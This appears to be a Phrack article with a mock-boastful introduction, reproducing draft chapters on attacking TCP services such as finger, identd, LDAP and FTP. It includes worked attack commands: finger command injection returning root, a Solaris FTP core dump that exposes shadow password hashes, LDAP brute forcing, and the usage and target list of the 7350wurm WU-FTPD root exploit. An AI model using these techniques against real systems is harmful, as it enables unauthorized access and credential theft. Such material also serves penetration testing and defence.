how to hack

                           ==Phrack Inc.==

               Volume 0x0b, Issue 0x3f, Phile #0x0c of 0x0f

|=---------------------------=[ How to Hack ]=--------------------------=|
|=------------------------------=[ so1o ]=------------------------------=|

1 - Introduction

2 - How Its Done
    2.1 - Chapter 5, Assessing TCP Network Services
    2.2 - Chapter 6, Assessing UDP Network Services

3 - Assorted IRC Logs - A Journey into My Psyche

--[ 1. Introduction

Friends! Confidence remains high in the hacking community as we enter
2004... despite what everybody says, the hacking scene is NOT dead!

As a token of my love, to all those people who supported my hacking
career by giving me warez and rootshells, to help me become the world's
foremost expert on ethical computer hacking that I am today, I would
like to offer this small token of my appreciation.

As many of you SHOULD know, I am publishing a book on attack and
penetration testing with O'reilly. Since my motto has always been
"Information needs to be freed!" I am offering you, free of charge,
and ready for immediate reading, 2 draft-cut chapters of my book.
Other infosec experts like Ryan Russell and Mike Schiffman "expose"
their hacking secrets to anybody with $45, but I'd like to send this
one out to the underground, on the house. I've chosen to include the
chapters as a standard ASCII text file, as opposed to a pdf or html,
so you can copy sections and paste them into the motd's of boxes
you have owned, so the administrators can figure out how they were
hacked and how to patch themselves.

--[ 2. How Its Done

----[ 2.1 Chapter 5, Assessing TCP Network Services

                                              Assessing TCP Network Services

This chapter focuses on the  technical  execution  of  TCP  network  service
assessment.  Common  services  (including  FTP,  SMTP,  HTTP  &  POP3)   are
accessible as plaintext network services, and  so  can  be  assessed  easily
using simple scripts or  even  a  telnet  client.  Services  that  use  non-
plaintext  proprietary  protocols  (including  NetBIOS,  SQL  &  LDAP)  must
however be assessed using more complex scripts or auditing tools, which  are
comprehensively covered in this chapter. Instead of comprehensively  listing
each and every TCP network service in order of port number,  you  will  find
that services have  been  grouped  by  their  role  (which  will  also  help
highlight common vulnerabilities found in different types of TCP services).

The roles that TCP services have been grouped by are as follows:

   Internal Services
   Remote Information Services

   Remote Maintenance Services
   Microsoft Windows Networking Services
   VPN & Remote Network Access Services
   Network Proxy Services

   E-Mail & News Services
   Web Services
   Database Services
   Unix RPC Services
   Print Services

Internal Services

A variety of operating systems including Cisco IOS, Windows 2000  and  Linux
are often found to be running internal services. Such internal services  are
historically  used  for  network  diagnostic   and   connectivity   checking
purposes,  and  rarely   have   useful   application   in   modern   network

Internal TCP services are commonly defined within Unix and Windows  services
files as the following (it should be noted that many of these services  also
listen on UDP ports):

   tcpmux          1/tcp
   echo            7/tcp
   discard         9/tcp
   daytime         13/tcp
   qotd            17/tcp
   chargen         19/tcp
   time            37/tcp

The echo, discard, qotd and chargen services  provide  little  insight  into
system configuration, and to date no direct  system  access  can  be  gained
through these services. A denial of service attack can however  be  launched
if both echo and chargen are running.

                     Echo and Chargen Denial of Service
   If host IP sequence numbers are easily predicted, a spoofed  TCP  session
   can be initiated to confuse the target system into connecting  to  itself
   from port 7 (echo) to port 19 (chargen) over  TCP  or  UDP.  The  chargen
   service generates a continuous stream of ASCII characters and sends  them
   to the echo service, causing  them  to  be  processed  and  echoed  back.
   Performance of devices with limited processing resources (such as  entry-
   level routers) can be degraded heavily with this type of  attack.  Denial
   of Service tools such as fraggle target these internal services.

The TCP multiplexer service (tcpmux, running on TCP port  1)  is  common  to
IRIX  system  platforms.  The  tcpmux  service  itself  contains  no   known
vulnerabilities, but is an indicator of the hosts  operating  platform.  The
service behaves much like an RPC portmapper, allowing for  services  to  run
on arbitrary ports (described in RFC 1078).

The daytime and time services (running on TCP ports 13 and 37  respectively)
can be queried to deduce  the  time  zone  of  the  target  system  and  its
approximate location, as shown in figure 22 below.

          Figure 22: Using telnet to connect to the daytime service
   # telnet 13
   Connected to
   Escape character is '^]'.
   Sat Jan  4 08:16:57 2003
   Connection closed by foreign host.

Remote Information Services

Unix-based systems (including Linux, Solaris, FreeBSD  and  other  variants)
and platforms  such  as  Cisco  IOS  can  be  found  to  be  running  remote
information services that provide system,  user  and  network  details  over
TCP/IP. Such services  can  be  probed  to  collate  username  listings  and
details of trusted networks and hosts, and in some cases compromise  systems

A simple list of  remote  information  services  has  been  taken  from  the
services file:

   systat          11/tcp
   netstat         15/tcp
   domain          53/tcp
   finger          79/tcp
   auth            113/tcp
   ldap            389/tcp

Systat and Netstat

The systat and netstat services in particular are of  interest,  as  current
network and system information can be easily gleaned through  connecting  to
the services using telnet. If we take a look at a Unix /etc/inetd.conf  file
from a system running systat and netstat, we find:

   systat   stream  tcp  nowait  root   /usr/bin/ps            ps
   netstat  stream  tcp  nowait  root   /usr/bin/netstat netstat

Effectively, the ps -ef and netstat -a commands are bound to  TCP  ports  11
and 15 respectively. Figures 23 and 24 show live  results  accessed  through
these services.

         Figure 23: Linux system information gleaned through systat
   # telnet 11
   Connected to
   Escape character is '^]'.
   UID        PID  PPID  C STIME TTY          TIME CMD
   root         1     0  0 Jan03 ?        00:00:05 init [2]
   root         2     1  0 Jan03 ?        00:00:00 [keventd]
   root         3     1  0 Jan03 ?        00:00:00
   root         4     1  0 Jan03 ?        00:00:00 [kswapd]
   root         5     1  0 Jan03 ?        00:00:00 [bdflush]
   root         6     1  0 Jan03 ?        00:00:00 [kupdated]
   root        10     1  0 Jan03 ?        00:00:00 [khubd]
   root       492     1  0 Jan03 ?        00:00:00 /sbin/syslogd
   root       495     1  0 Jan03 ?        00:00:00 /sbin/klogd
   root       503     1  0 Jan03 ?        00:00:00
   /usr/sbin/dhcpd -q
   root       512     1  0 Jan03 ?        00:00:00
   root       520     1  0 Jan03 ?        00:00:00 /usr/sbin/sshd
   daemon     523     1  0 Jan03 ?        00:00:00 /usr/sbin/atd
   root       526     1  0 Jan03 ?        00:00:00 /usr/sbin/cron
   root       531     1  0 Jan03 tty1     00:00:00 -bash
   root       532     1  0 Jan03 tty2     00:00:00 /sbin/getty
   38400 tty2
   root       533     1  0 Jan03 tty3     00:00:00 /sbin/getty
   38400 tty3
   root       534     1  0 Jan03 tty4     00:00:00 /sbin/getty
   38400 tty4
   root       535     1  0 Jan03 tty5     00:00:00 /sbin/getty
   38400 tty5
   root       536     1  0 Jan03 tty6     00:00:00 /sbin/getty
   38400 tty6
   root       887     1  0 Jan03 ?        00:00:03
   root       913     1  0 Jan03 ?        00:00:00 [eth0]
   root       918     1  0 Jan03 ?        00:00:00 [eth1]
   root      1985   520  0 08:05 ?        00:00:00 /usr/sbin/sshd
   root      1987  1985  0 08:05 pts/0    00:00:00 -bash
   root      2066  1987  0 10:44 pts/0    00:00:00 ps -ef
         Figure 24: Linux system information gleaned through netstat
   # telnet 15
   Connected to
   Escape character is '^]'.
   Active Internet connections (servers and established)
   Proto Recv-Q Send-Q Local Address           Foreign Address
   tcp        0      0 *:time                  *:*
   tcp        0      0 *:discard               *:*
   tcp        0      0 *:daytime               *:*
   tcp        0      0 no-dns-yet.demon:domain *:*
   tcp        0      0      *:*
   tcp        0      0 mail:domain             *:*
   tcp        0      0 *:ssh                   *:*
   tcp        0      0 *:smtp                  *:*
   tcp        0     52 pc-62-20-40-1-
   az.b:3526 ESTABLISHED
   udp        0      0 *:32769                 *:*
   udp        0      0 *:discard               *:*
   udp        0      0 no-dns-yet.demon:domain *:*
   udp        0      0      *:*
   udp        0      0 mail:domain             *:*
   udp        0      0 *:bootps                *:*
   raw        0      0 *:icmp                  *:*
   Active UNIX domain sockets (servers and established)
   Proto RefCnt Flags       Type       State         I-Node Path
   unix  5      [ ]         DGRAM                    456
   unix  2      [ ACC ]     STREAM     LISTENING     1125
   unix  2      [ ]         DGRAM                    1123
   unix  2      [ ]         DGRAM                    516
   unix  2      [ ]         DGRAM                    489

This detailed system information gives insight into the following  areas  of
the target environment:

Processes running on the target host
   2. User names of process owners that can be later used to undertake brute
      force password guessing attacks to gain access to network components
   3. Sensitive details within process strings (such as a SQL query run from
      the command line  containing  both  the  SQL  server  IP  address  and
      password details)
Details of current network connections to internal and trusted hosts


The Domain Name System is  primarily  used  across  UDP  and  so  assessment
techniques are comprehensively covered in Chapter 6.  Most  DNS  servers  do
also listen on TCP port 53 for DNS zone  transfer  purposes  when  secondary
name servers request the latest DNS zone file from the primary name server.

As discussed earlier in Chapter 3, a DNS  zone  file  contains  all  of  the
naming information that the name server  stores  regarding  a  specific  DNS
domain. A DNS zone transfer can often be launched  to  retrieve  details  of
non-public internal networks and other useful information that can  be  used
to build an accurate map of the target infrastructure.

It is  strongly  recommended,  for  reasons  of  load  balancing  and  fault
tolerance, that organizations use more than one name server. The  main  name
server is known as the primary name server, and all subsequent name  servers
are secondary name servers. Either a primary or secondary  name  server  can
be queried for name resolution, so it is necessary that the DNS  information
residing on each name server is current. To ensure this is the case, when  a
secondary name server is  started  and  at  regular,  specifiable  intervals
thereafter,  it  requests  a  complete  listing  of  the  computers  it   is
responsible for from the primary name server. The process of requesting  and
receiving this information is a zone transfer.

Windows tools such as nslookup and the Sam Spade Windows  client  (available
from can be used  to  perform  a  DNS  zone  transfer  (as
detailed earlier in Chapter 3), but the most effective method is to issue  a
DNS zone transfer request against a specific DNS server is to use  the  Unix
dig command:

   # dig axfr

   ; <<>> DiG 9.2.1 <<>> axfr
   ;; global options:  printcmd               86400   IN      SOA     ain- 301033806 7200 3600 604800 86400               86400   IN      NS               86400   IN      NS               86400   IN      MX      5   86400   IN      CNAME   86400   IN      CNAME 86400  IN      CNAME  86400   IN      A 86400 IN      CNAME  86400   IN      A         86400   IN      CNAME    86400   IN      CNAME   ain-relay2- 86400 IN     CNAME   86400   IN      A           86400   IN      A          86400   IN      CNAME       86400   IN      A 86400  IN      CNAME    86400   IN      CNAME  86400   IN      CNAME       86400   IN      A 86400 IN      A 86400 IN      CNAME 86400 IN      A        86400   IN      CNAME   ex-rtr-          86400   IN      CNAME    86400   IN      CNAME 86400  IN      CNAME   ain-relay1-     86400   IN      CNAME   86400   IN      CNAME        86400   IN      A        86400   IN      A 86400   IN      CNAME   ain-relay1-     86400   IN      CNAME   ain-relay1-    86400   IN      HINFO   "Cisco 4000
   Router" "NP-1E Board
   "    86400   IN      A 86400  IN      CNAME   ain-relay2- 86400  IN      CNAME    86400   IN      CNAME   ain-relay1-               86400   IN      SOA     ain- 301033806 7200 3600 604800 86400
   ;; Query time: 169 msec
   ;; SERVER:
   ;; XFR size: 41 records


The finger service is commonly found listening on TCP  port  79  of  devices
such as Cisco routers and managed switches. Default  out-the-box  builds  of
many commercial Unix-based systems run the service  (including  Solaris  and

The finger service can be queried using either the finger client  (found  in
most operating platforms) or by directly  using  telnet  and  connecting  to
port 79. Figures 25 and 26 follow, showing the difference  in  results  from
fingering a Cisco IOS device and a Solaris server.

        Figure 25: A finger query against a Cisco router using telnet
   # telnet 79
   Connected to
   Escape character is '^]'.

       Line     User      Host(s)                  Idle Location
   *  1 vty 0             idle                 00:00:00
     Se0                  Sync PPP             00:00:00
   Connection closed by foreign host.
        Figure 26: Using the finger client to query a Solaris server
   # finger @
   Login       Name               TTY         Idle    When
   crm      Chris McNab           pts/0          1 Tue 09:08
   axd      Andrew Done           pts/4         3d Thu 11:57

A null query will result in the current users being shown under most  finger
services.  From  analyzing  the  format  of  the  response,  we  can  easily
differentiate a Cisco finger service from that running on a Solaris host.

Finger Information Leak Bugs

Various information leak vulnerabilities exist  in  finger  implementations,
of which a popular attack involves a '1 2 3 4 5 6 7 8 9 0'  request  against
a Solaris host running fingerd. This following bug shown  in  figure  27  is
present in all Solaris releases up to 8:

      Figure 27: Using a malformed finger request to glean user details
   # finger '1 2 3 4 5 6 7 8 9 0'@
   Login       Name               TTY         Idle    When
   root     Super-User            console      <Jun  3 17:22> :0
   admin    Super-User            console      <Jun  3 17:22> :0
   daemon          ???                         < .  .  .  . >
   bin             ???                         < .  .  .  . >
   sys             ???                         < .  .  .  . >
   adm      Admin                              < .  .  .  . >
   lp       Line Printer Admin                 < .  .  .  . >
   uucp     uucp Admin                         < .  .  .  . >
   nuucp    uucp Admin                         < .  .  .  . >
   listen   Network Admin                      < .  .  .  . >
   nobody   Nobody                             < .  .  .  . >
   noaccess No Access User                     < .  .  .  . >
   nobody4  SunOS 4.x Nobody                   < .  .  .  . >
   informix Informix User                      < .  .  .  . >
   crm      Chris McNab           pts/0          1 Tue 09:08
   axd      Andrew Done           pts/4         3d Thu 11:57

Many Unix-based finger services perform a simple  cross-reference  operation
of the query string against  user  information  fields  in  the  /etc/passwd
file, and so the following finger query strings can be used to glean  useful

   finger **

Finger Redirection

In some cases, servers running finger will exist on multiple networks  (such
as the Internet and an internal network space). With knowledge  of  internal
IP ranges and host names, it is often possible to perform  a  finger  bounce
attack to glean internal user names and host details as shown in  figure  28

      Figure 28: Using finger to redirect a request to an internal host
   # finger @
   Login       Name               TTY         Idle    When
   crm      Chris McNab           pts/0          1 Tue 09:08
   axd      Andrew Done           pts/4         3d Thu 11:57

Directly Exploitable Finger Bugs

Poorly written finger implementations will allow attackers to pipe  commands
through finger which are in turn run on the target host by the owner of  the
service process (such as root or bin under Unix-based  systems).  Figure  29
below shows  an  example  of  a  vulnerable  finger  service  running  on  a
vulnerable DG-UX platform.

          Figure 29: Issuing id and netstat commands through finger
   # finger "|/bin/id@"
   uid=0(root) gid=0(root)

   # finger "|/bin/netstat@"
   Active Internet connections (w/o servers)
   Proto Recv-Q Send-Q Local Address           Foreign Address
   tcp        0      0 localhost.localdo:45233
   localhost.localdo:45232 ESTABLISHED
   tcp        0      0 localhost.localdo:45232
   localhost.localdo:45233 ESTABLISHED
   tcp        0      0 localhost.localdo:45235
   localhost.localdo:45234 ESTABLISHED
   tcp        0      0 localhost.localdo:45234
   localhost.localdo:45235 ESTABLISHED
   tcp        0      0 localhost.localdo:45237
   localhost.localdo:45236 ESTABLISHED
   tcp        0      0 localhost.localdo:45236
   localhost.localdo:45237 ESTABLISHED
   tcp        0  11433     ESTABLISHED
   tcp        0      0 localhost.localdo:45229
   localhost.localdo:45228 ESTABLISHED
   tcp        0      0 localhost.localdo:45228
   localhost.localdo:45229 ESTABLISHED
   tcp        0      0 localhost.localdo:45231
   localhost.localdo:45230 ESTABLISHED
   tcp        0      0 localhost.localdo:45230
   localhost.localdo:45231 ESTABLISHED
   tcp        0      0   ESTABLISHED
   tcp        0      0    ESTABLISHED

Serious  buffer  overflow  vulnerabilities  exist  in  many  Linux   fingerd
packages, including cfingerd. At the time of  writing,  cfingerd  1.4.3  and
prior running on Linux (packaged with Debian and Red Hat in  particular)  is
especially susceptible to a  plethora  of  remote  and  locally  exploitable
bugs. For current details of publicly available fingerd  exploits,  you  can
search Packet Storm's archives for 'finger exploit'.


The Unix auth service (also known as identd) listens on TCP  port  113.  The
primary purpose of auth is to provide a  degree  of  authentication  through
mapping local user names to TCP network  ports  being  used.  IRC  (Internet
Relay Chat) is a good example of this, as when a user  connects  to  an  IRC
server, an auth request is sent to TCP port 113 of the host to retrieve  the
user's current login name.

The auth service can be queried in-line with RFC  1413  to  match  open  TCP
ports on the target host with local  usernames.  This  username  information
has two different uses to an attacker:

To derive the owners of processes with open ports
   If for example, a vulnerable version of BIND is found to be running on  a
   target server and TCP port 113 is also open, an  identd  cross-referenced
   port scan will reveal the user running the BIND process on the server. If
   the process is owned by named (as opposed to root), then the BIND process
   may exist in a chroot jail and be difficult to compromise.
To enumerate and list valid usernames
   From enumerating valid user login details, an attacker can seek to launch
   brute force attacks and take advantage of weak password policies.

Nmap has the capability to cross-reference open ports  with  identd.  Figure
30 below shows such an identd scan  being  run  to  identify  a  handful  of
active user accounts.

       Figure 30: Nmap being used to perform identd cross-referencing
   # nmap -I -sS

   Starting nmap V. 3.00 ( )
   Interesting ports on dockmaster (
   (The 1595 ports scanned but not shown below are in state:
   Port       State       Service                 Owner
   22/tcp     open        ssh                     root
   25/tcp     open        smtp                    root
   80/tcp     open        http                    nobody
   110/tcp    open        pop-3                   root
   113/tcp    open        auth                    ident
   8080/tcp   open        http-proxy              nobody

The Linux jidentd and  cidentd  packages  contain  various  buffer  overflow
vulnerabilities. It is highly recommended that research is  undertaken  when
assessing servers found to have identd  running,  including  enumeration  of
the operating platform to ascertain the  probable  type  of  identd  service


The Unix rusersd service is an RPC  (Remote  Procedure  Call)  service  that
listens on a dynamic TCP port. The rusers client utility first  connects  to
the RPC portmapper on TCP port 111, which returns  the  whereabouts  of  the
rusers service if it is indeed active.

If during initial TCP port scans, the RPC portmapper service  is  not  found
to be accessible on TCP port 111, it is highly unlikely  that  rusersd  will
be running. However if TCP port 111 is found to be accessible,  the  rpcinfo
client can  be  used  to  check  for  the  presence  of  rusersd  and  other
accessible RPC services as detailed below in figure 31.

     Figure 31: Using rpcinfo to retrieve details of active RPC services
   # rpcinfo -p
   program vers proto port  service
   100000   4    tcp  111   rpcbind
   100000   4    udp  111   rpcbind
   100024   1    udp  32772 status
   100024   1    tcp  32771 status
   100021   4    udp  4045  nlockmgr
   100021   2    tcp  4045  nlockmgr
   100005   1    udp  32781 mountd
   100005   1    tcp  32776 mountd
   100003   2    udp  2049  nfs
   100011   1    udp  32822 rquotad
   100002   2    udp  32823 rusersd
   100002   3    tcp  33180 rusersd

From finding that rusersd is indeed running, we can probe the  service  with
the rusers client from any Unix-based platform to retrieve a list  of  users
who are logged into the system:

   # rusers -l
   Sending broadcast for rusersd protocol version 3...
   Sending broadcast for rusersd protocol version 2...
   jah      onyx:console            Mar  3 13:03   22:03
   amber    onyx:ttyp1              Mar  2 07:40
   sebree   onyx:ttyp5              Mar  2 10:35      14
   tut      onyx:ttyp6              Mar  2 10:48


The Lightweight Directory Access Protocol (LDAP) service is  commonly  found
on Windows 2000 Active Directory, Exchange and  Lotus  Domino  servers.  The
system is used to provide user directory information  to  clients.  LDAP  is
highly extensible and widely supported  by  Apache,  MS  Exchange,  Outlook,
Netscape Communicator and others.

LDAP  can  be  queried  anonymously  (mileage  depending   on   the   server
configuration) using the ldp.exe utility from  the  Microsoft  Windows  2000
Support Tools Kit (found on the Windows 2000 Server  installation  CD  under
the /support/tools/ directory). Figure 32  below  shows  ldp.exe  being  run
against a Windows 2000 server running Lotus Domino.

           Figure 32: Enumerating information anonymously via LDAP


A very simple Unix-based alternative to ldp.exe is the ldapsearch tool  that
is bundled with  OpenLDAP  (,  shown  performing  the  same
anonymous LDAP  search  against  (a  Lotus  Domino  server  on
Windows 2000):

   # ldapsearch -h

   < non-relevant results removed for aesthetic purposes >

   # Nick Baskett, Trustmatta
   dn: CN=Nick Baskett,O=Trustmatta
   givenname: Nick
   sn: Baskett
   cn: Nick Baskett, nick
   uid: nick
   maildomain: trustmatta

   # Andrew Done, Trustmatta/2C andrew
   dn: CN=Andrew Done,O=Trustmatta/, andrew
   givenname: Andrew
   sn: Done
   uid: andrew
   maildomain: trustmatta

   # James Woodcock, Trustmatta/2C james
   dn: CN=James Woodcock,O=Trustmatta/, james
   givenname: James
   sn: Woodcock
   uid: james
   maildomain: trustmatta

   # Jim Chalmers, Trustmatta/2C jim
   dn: CN=Jim Chalmers,O=Trustmatta/, jim
   givenname: Jim
   sn: Chalmers
   uid: Jim
   maildomain: trustmatta

Anonymous access to LDAP has limited use, however if LDAP is  found  running
under Windows 2000 it can be attacked by brute force with a  list  of  valid
user names (enumerated through NetBIOS, SNMP or other  techniques)  to  find
both users with weak system passwords, and gain access to LDAP itself.

The Unix-based bf_ldap tool can be  used  to  effectively  perform  an  LDAP
brute force attack, available from
The usage of bf_ldap is demonstrated in figure 33 as follows.

               Figure 33: The bf_ldap LDAP brute force utility
   # bf_ldap
   Eliel Sardanons <>
   bf_ldap <parameters> <optional>
           -s server
           -d domain name
           -u|-U username | users list file name
           -L|-l passwords list | length of passwords to generate
           -p port (default 389)
           -v (verbose mode)
           -P Ldap user path (default ,CN=Users,)

Remote Maintenance Services

Services used by network administrators  to  directly  manage  remote  hosts
over TCP/IP include Telnet,  FTP,  SSH,  VNC  and  raft  of  others.  Remote
maintenance services  are  threatened  by  three  categories  of  attack  in

Information leak attacks, where user and system details can be gleaned
Process manipulation, including overflow attacks involving malformed data
Brute force guessing of user passwords to gain direct access

For example, an online bank  may  be  running  the  telnet  service  on  its
Internet routers for administrative purposes. This telnet  service  may  not
be vulnerable to information leak or process  manipulation  attacks,  but  a
determined attacker will spend an amount of time undertaking a  brute  force
attack against the device service in order to gain access.  Brute  force  is
seriously underestimated as an attack vector by many organizations.

Common remote maintenance services taken  from  the  services  file  are  as

   ftp             21/tcp
   ssh             22/tcp
   telnet          23/tcp
   exec            512/tcp
   login           513/tcp
   shell           514/tcp
   controlit       799/tcp
   x11             6000/tcp
   citrix-ica      1494/tcp
   ms-rdp          3389/tcp
   pcanywheredata  5631/tcp
   pcanywherestat  5632/tcp
   vnc-http        5800/tcp
   vnc             5900/tcp
   pcanywhere      65301/tcp


File Transfer Protocol services  are  primarily  found  running  on  network
servers for file transfer purposes. The FTP service uses two  TCP  ports  to
function correctly:

   TCP port 21 (the FTP control port), used to issue FTP commands
   TCP port 20 (the FTP data port), used to transfer data from the server to

When finding a server running FTP, the first piece of information that  will
be gleaned from connecting to the service is the FTP server banner:

   # ftp
   Connected to (
   220 darkside FTP server ready.
   Name (

The banner above is that of a Solaris 9 server. Solaris 8  (SunOS  5.8)  and
prior return the operating system detail in a slightly different banner:

   # ftp
   Connected to (
   220 lackie FTP server (SunOS 5.8) ready.
   Name (

If the banner is  obfuscated  or  modified  to  remove  service  version  or
operating system information, the service can  sometimes  be  identified  by
analyzing responses  to  quote  help  and  syst  commands  upon  logging  in
anonymously, as shown in figure 34 below.

             Figure 34: Logging into and querying an FTP service
   # ftp
   Connected to (
   220 FTP server ready.
   Name ( ftp
   331 Guest login ok, send your complete e-mail address as
   230 Guest login ok, access restrictions apply.
   Remote system type is UNIX.
   Using binary mode to transfer files.
   ftp> quote help
   214-The following commands are recognized (* =>'s
      USER    PORT    STOR    MSAM*   RNTO    NLST    MKD
      PASS    PASV    APPE    MRSQ*   ABOR    SITE    XMKD
      ACCT*   TYPE    MLFL*   MRCP*   DELE    SYST    RMD
      SMNT*   STRU    MAIL*   ALLO    CWD     STAT    XRMD
      REIN*   MODE    MSND*   REST    XCWD    HELP    PWD
      QUIT    RETR    MSOM*   RNFR    LIST    NOOP    XPWD
   214 Direct comments to
   ftp> syst
   215 UNIX Type: L8 Version: SUNOS

Common FTP Banner List

Sun Solaris 7:

   220 hostname FTP server (SunOS 5.7) ready.

Sun SunOS 4.1.x:

   220 hostname FTP server (SunOS 4.1) ready.

FreeBSD 3.x:

   220 hostname FTP server (Version 6.00) ready.

FreeBSD 4.x:

   220 hostname FTP server (Version 6.00LS) ready.

NetBSD 1.5.x:

   220 hostname FTP server (NetBSD-ftpd 20010329) ready.


   220 hostname FTP server (Version 6.5/OpenBSD) ready.


   220 hostname FTP server ready.

IBM AIX 4.x:

   220 hostname FTP server (Version 4.1 Tue Sep 8 17:35:59 CDT
   1998) ready.

Compaq Tru64:

   220 hostname FTP server (Digital UNIX Version 5.60) ready.

HP-UX 11.x:

   220 hostname FTP server (Version Wed Feb  9 08:03:34
   GMT 2000) ready.

DEC Ultrix 4.1:

   220 hostname FTP server (Version 4.1 Sun Mar 25 22:59:11 EST
   1990) ready.

Apple MacOS:

   220 hostname FTP server (Version 6.00) ready.

Washington University FTP (WU-FTP) 2.4.2 BETA 18:

   220 hostname FTP server (Version wu-2.4.2-academ[BETA-18](1)
   Mon Jan 15 15:02:27 JST 1999) ready.

Washington University FTP (WU-FTP) 2.5.0:

   220 hostname FTP server (Version wu-2.5.0(1) Tue Jun 15
   12:43:57 MST 1999) ready.

ProFTPD 1.2.4

   220 ProFTPD 1.2.4 Server (hostname) [hostname]

WU-FTP and  ProFTPD  are  often  found  running  on  Linux  hosts,  although
sometimes administrators chose to run these  third  party  FTP  services  on
FreeBSD, Solaris and other Unix-based platforms.

Solaris FTP Vulnerabilities

The following glob() bug is present in out-the-box Solaris installations  up
to Solaris 8. By issuing requests  of  CWD  ~username,  we  can  effectively
enumerate valid user accounts without  even  logging  into  the  FTP  server
(described in  detail  at  In
this example, blah and test users do not exist, but chris does:

   # telnet 21
   Connected to
   Escape character is '^]'.
   220 lackie FTP server (SunOS 5.8) ready.
   CWD ~blah
   530 Please login with USER and PASS.
   550 Unknown user name after ~
   CWD ~test
   530 Please login with USER and PASS.
   550 Unknown user name after ~
   CWD ~chris
   530 Please login with USER and PASS.
   221 Goodbye.
   Connection closed by foreign host.

This glob() bug can  be  exploited  within  Solaris,  resulting  in  a  heap
overflow. Local users can easily abuse this bug  so  that  the  Solaris  FTP
service dumps a core file  containing  encrypted  user  passwords  from  the
/etc/shadow file, and other sensitive information (vulnerable in  Solaris  8
and below):

   $ telnet localhost 21


   Connected to localhost.

   Escape character is '^]'.

   220 cookiemonster FTP server (SunOS 5.6) ready.

   user chris

   331 Password required for chris.
   pass blahblah

   530 Login incorrect.

   CWD ~

   530 Please login with USER and PASS.

   Connection closed by foreign host.

   $ ls -la /core

   -rw-r--r-- 1 root root 284304 Apr 16 10:20 /core

   $ strings /core | grep ::


A public exploit has not yet been released to  remotely  compromise  Solaris
hosts  with  this  vulnerability.  Theoretically,  the  service   could   be
exploited under Solaris if write access to  the  file  system  is  permitted
through FTP (although this may be difficult to exploit under Solaris due  to
NULL pointer issues). The glob() vulnerability has been  publicly  exploited
under BSD systems (including NetBSD, OpenBSD, FreeBSD), which  discussed  in
the following section.

BSD FTP Vulnerabilities

for     which     an     exploit     script      is      available      from

FTP server 6.00

FTP server 6.00LS

WU-FTPD Vulnerabilities

WU-FTPD 2.4.2 BETA 18

WU-FTPD version 2.4.2 BETA 18 and prior are vulnerable to a  stack  overflow
due to insufficient bounds checking in the realpath()  function  within  the
FTP service. Exploitation occurs through  an  attacker  creating  a  complex
directory structure and then navigating through the structure and  executing
arbitrary commands through a stack overflow.

A  Unix  exploit  script  for  use  against  Red  Hat  and  Slackware  Linux
distributions   running   WU-FTPD   2.4.2   BETA   18   is    archived    at The CVE reference  for  this  vulnerability
is CVE-1999-0368, and the ISS X-Force has compiled background  vulnerability
information at

WU-FTPD 2.5.0

WU-FTPD version 2.5.0 and prior is  vulnerable  to  remote  a  MAPPING_CHDIR
stack overflow, through a user with write access to the FTP server  creating
a series of  directories  on  the  host,  and  using  CWD  to  overflow  the
mapped_path variable.

An exploit for use  against  Red  Hat  and  Debian  Linux  distributions  is
ifafoffuffoffaf    by    TESO,    available    in    source    form     from  The  CVE  reference  for   this
vulnerability is CVE-1999-0878, and the ISS X-Force has compiled  background
vulnerability information at

WU-FTPD 2.6.0

WU-FTPD version 2.6.0 and prior is vulnerable to an lreply() and  SITE  EXEC
format string attack. In order for the attack to be executed, the user  must
be successfully logged in either anonymously or with a valid account.

Many versions of the remote exploit can be found for FreeBSD,  Red  Hat  and
SuSe    Linux    (one    exploit    in    particular    is    archived    at   The   CVE   reference    for    the
vulnerability is CVE-2000-0573, and the ISS  X-Force  has  compiled  a  good
list    of    links    and    background    information    accessible     at

WU-FTPD 2.6.1

WU-FTPD version 2.6.1 and prior  is  vulnerable  a  glob()  heap  corruption
attack through issuing a series of RNFR and  CWD  ~{  commands  to  the  FTP
service. In order for such commands to  be  successfully  issued,  the  user
must be logged in either anonymously, or with a legitimate user account.

TESO  released  an  exploit  script  called  7350wurm  that  is  capable  of
exploiting  this  vulnerability  on  most  Linux  distributions   (Red  Hat,
Debian, Mandrake, SuSe, Immunix and Caldera in particular), and is  archived
at   The   CVE   reference   for   the
vulnerability is CVE-2001-550, and the ISS X-Force has compiled a good  page
of     background     information     about     the     vulnerability     at

Exploiting WU-FTPD on Linux with 7350wurm

One excellent trick that 7350wurm has up its sleeve  is  the  capability  to
effectively exploit the following WU-FTPD servers  found  running  on  Linux
hosts out-of-the-box:

   # 7350wurm
   7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version
   team teso (thx bnuts, tomas, !).

   usage: ./7350wurm [-h] [-v] [-a] [-D] [-m]
           [-t <num>] [-u <user>] [-p <pass>] [-d host]
           [-L <retloc>] [-A <retaddr>]

   -h      this help
   -v      be verbose (default: off, twice for greater effect)
   -a      AUTO mode (target from banner)
   -D      DEBUG mode (waits for keypresses)
   -m      enable mass mode (use with care)
   -t num  choose target (0 for list, try -v or -v -v)
   -u user username to login to FTP (default: "ftp")
   -p pass password to use (default: "mozilla@")
   -d dest IP address or fqhn to connect to (default:
   -L loc  override target-supplied retloc (format: 0xdeadbeef)
   -A addr override target-supplied retaddr (format: 0xcafebabe)

   # 7350wurm -t0
   7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version
   team teso (thx bnuts, tomas, !).

   num . description
     1 | Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-
     2 | Debian potato [wu-ftpd_2.6.0-3.deb]
     3 | Debian potato [wu-ftpd_2.6.0-5.1.deb]
     4 | Debian potato [wu-ftpd_2.6.0-5.3.deb]
     5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb]
     6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]
     7 | Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]
     8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-
     9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]
    10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]
    11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]
    12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]
    13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]
    14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]
    15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]
    16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]
